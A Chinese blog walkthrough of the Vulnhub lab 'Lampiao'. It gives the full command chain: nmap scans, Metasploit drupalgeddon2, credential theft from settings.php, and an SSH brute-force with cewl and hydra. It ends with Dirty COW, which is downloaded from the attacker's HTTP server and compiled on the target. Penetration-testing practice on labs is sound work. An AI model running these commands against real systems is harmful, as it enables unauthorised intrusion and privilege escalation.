因为本透明水平看来还没达到手撕vulnhub的级别,所以这些靶场都是参考的前辈们的文章一步步来的,由于作者水平有限所以写的博客会“雷厉风行”走的是一步到位相对更简单的渗透路线,尽量少出现尝试并且失败渗透无果的方法。就当是无数条路线中每一步都“幸运”的成功的那条吧。

攻击机:Kali Linux IP:192.168.223.136

靶    机:Lampiao IP:192.168.223.144

    开启Lampiao后首先看到的登录页面:

Vulnhub靶场篇:Lampiao 夜车星繁的博客-编程知识网

扫描出靶场ip地址后输出更详细信息: 

nmap -T4 -A -v 192.168.223.144

扫描出两个端口和一堆乱码:

Vulnhub靶场篇:Lampiao 夜车星繁的博客-编程知识网

可以看到22端口和80端口开放,我们可以浏览器访问下20端口,再用命令:

nmap -sS -sV -T4 -A -p- 192.168.223.144

扫描列出更详细信息:

Vulnhub靶场篇:Lampiao 夜车星繁的博客-编程知识网

 可以看到靶机另外开放了1898端口,我们分别访问这两个端口:

Vulnhub靶场篇:Lampiao 夜车星繁的博客-编程知识网

Vulnhub靶场篇:Lampiao 夜车星繁的博客-编程知识网

审计80端口未得到有用信息,我们在1898端口页面随便点一点:

Vulnhub靶场篇:Lampiao 夜车星繁的博客-编程知识网

点击进去后发现URL可以修改,我们将路径修改为:http://192.168.223.144:1898/?q=node/2

Vulnhub靶场篇:Lampiao 夜车星繁的博客-编程知识网

发现两个文件audio.m4a和qrc.png

尝试访问发现了其中一个音频提示,user  tiago

另外发现一张二维码,使用CQR扫描得到一段鼓励:Try harder! muahuahua

在此页面使用火狐插件wappalyzer我们可以看到此cms类型及版本:

Vulnhub靶场篇:Lampiao 夜车星繁的博客-编程知识网

此时打开kali攻击机metasploit搜索相关信息并尝试利用:

search drupaluse exploit/unix/webapp/drupal_drupalgeddon2set rhosts 192.168.223.144set rport 1898exploitshellpython -c 'import pty;pty.spawn("/bin/bash")'#优化终端界面,便于操作

Vulnhub靶场篇:Lampiao 夜车星繁的博客-编程知识网

得到了www-data权限;

但是通过su命令无法提权

我们通过mysql数据库,修改tiago、Eder、ADMIN的密码;新开一个终端界面通过find查找settings.php配置文件的位置

find -name settings.php
cat  /var/www/html/sites/default/settings.php

默认的settings.php存放位置为/var/www/html/sites/default/settings.php

Vulnhub靶场篇:Lampiao 夜车星繁的博客-编程知识网

找到了数据库用户名与密码

接下来可以有两个思路,一是暴力破解tiago用户的ssh密码;一是登录MySQL数据库修改tiago的密码:

我们此处选择cewl配合hydra爆破;

cewl是用来爬取网站页面信息生成密码字典的一个字典生成密码工具

cewl http://192.168.223.144:1898/?q=node/1 -w punisher.txt
hydra -l tiago -P punisher.txt 192.168.223.144 ssh

爆破出结果:

Vulnhub靶场篇:Lampiao 夜车星繁的博客-编程知识网

登录ssh

ssh tiago@192.168.223.144

Vulnhub靶场篇:Lampiao 夜车星繁的博客-编程知识网

 

接下来要进行提权,运行命令:uname -a查看系统内核版本:

Linux lampiao 4.4.0-31-generic #50~14.04.1-Ubuntu SMP Wed Jul 13 01:06:37 UTC 2016 i686 i686 i686 GNU/Linux

发现这是16年版本;在Linux内核里有个9年高龄的漏洞:脏牛提权漏洞,在16年10月18日之前的Linux未打补丁则会有此漏洞

相关文章:https://www.freebuf.com/vuls/117331.html

Vulnhub靶场篇:Lampiao 夜车星繁的博客-编程知识网

搜索脏牛提权exp:

searchsploit dirty

Vulnhub靶场篇:Lampiao 夜车星繁的博客-编程知识网

在此我们使用cpp文件exp:

使用CP进行复制到本地,cp /usr/share/exploitdb/exploits/linux/local/40847.cpp /root/Desktop

在kali机开启服务用于传送exp:

python -m SimpleHTTPServer 5555

在ssh用户tiago下下载exp并编译:

wget http://192.168.223.136:5555/40847.cpp
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o 40847 40847.cpp -lutil
  • Wall 一般使用该选项,允许发出GCC能够提供的所有有用的警告
  • pedantic 允许发出ANSI/ISO C标准所列出的所有警告
  • O2编译器的优化选项的4个级别,-O0表示没有优化,-O1为缺省值,-O3优化级别最高
  • std=c++11就是用按C++2011标准来编译的
  • pthread 在Linux中要用到多线程时,需要链接pthread库
  • o dcow gcc生成的目标文件,名字为dcow
  • 执行gcc编译可执行文件,可直接提权。Vulnhub靶场篇:Lampiao 夜车星繁的博客-编程知识网

 至此得到root权限,靶机渗透成功。

内容还是出现了让人不知如何是好的冗余,自己的水平还需努力,共勉